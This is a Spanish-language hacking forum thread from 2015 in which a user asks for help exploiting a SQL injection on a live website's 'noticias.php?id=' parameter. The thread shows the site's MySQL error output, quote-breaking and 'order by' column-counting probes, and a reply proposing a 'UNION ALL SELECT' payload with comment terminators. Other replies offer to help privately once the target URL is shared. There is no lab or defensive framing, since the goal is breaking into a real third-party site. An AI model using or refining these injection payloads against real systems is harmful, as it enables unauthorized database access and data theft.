[DUDA] Inyecciones SQL con '

Iniciado por bytefloat, 27 Junio 2015, 05:06 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

bytefloat

27 Junio 2015, 05:06 AM
Hola, me estoy volviendo loco con este pequeño problema...
Todos sabemos que normalmente en una inyeccion sql... hay 2 caminos
Código [Seleccionar]
noticias.php?id=-2
Código [Seleccionar]
noticias.php?id=2' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2''' at line 1 SELECT * from web where id_cli='30' and idioma='espanol' and upper(pagina)='1''

Resulta que me da error la segunda, sin embargo, no hallo como seguir con ella, he intentado hasta con
Código [Seleccionar]
noticias.php?id=1'and'1 order by 400-- Y no puedo sacar un order by para la cantidad columnas, pues  en este caso me tira la página sin noticias,

Alguna idea de como "anular" el 1' para poner un order by? , normalmente con las otras inyecciones hacía un "-5 order by 30-- " y bastaba..

Saludos

quiAnar

#1
4 Julio 2015, 06:50 AM Ultima modificación: 22 Agosto 2016, 00:55 AM por quiAnar
no son los unicos caminos hay muchos más, seria bueno que pusieras la url

también no olvides que el signo de comentarios influye.
"En caso de duda, utiliza la fuerza bruta"

Shell Root

#2
5 Julio 2015, 23:26 PM
@samles la url no se puede poner aquí. Por otro lado @bytefloat enviame un M.P con la url y te explico puntualmente.  :silbar:
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

sqln00b

#3
19 Julio 2015, 06:42 AM
Vengo a preguntas nada más, al finalizar un comentario en MySQL ¿no se debe hacer?

Código [Seleccionar]
%20--%20
/*
#


¿En ésa url se podría poner un UNION hasta que devolviera el valor de las cantidad de columnas?

Código [Seleccionar]
1' UNION ALL SELECT 1,2,3,4,5,[...]%20--%20

Gracias ;D
Imprimir
Ir Arriba Páginas1
Acciones del Usuario